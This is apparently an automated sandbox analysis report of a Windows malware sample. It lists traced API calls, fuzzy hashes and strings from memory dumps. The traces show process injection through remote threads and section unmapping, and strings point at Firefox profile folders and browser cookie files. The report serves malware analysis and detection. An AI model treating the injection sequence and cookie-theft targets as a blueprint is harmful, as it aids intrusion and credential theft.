  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
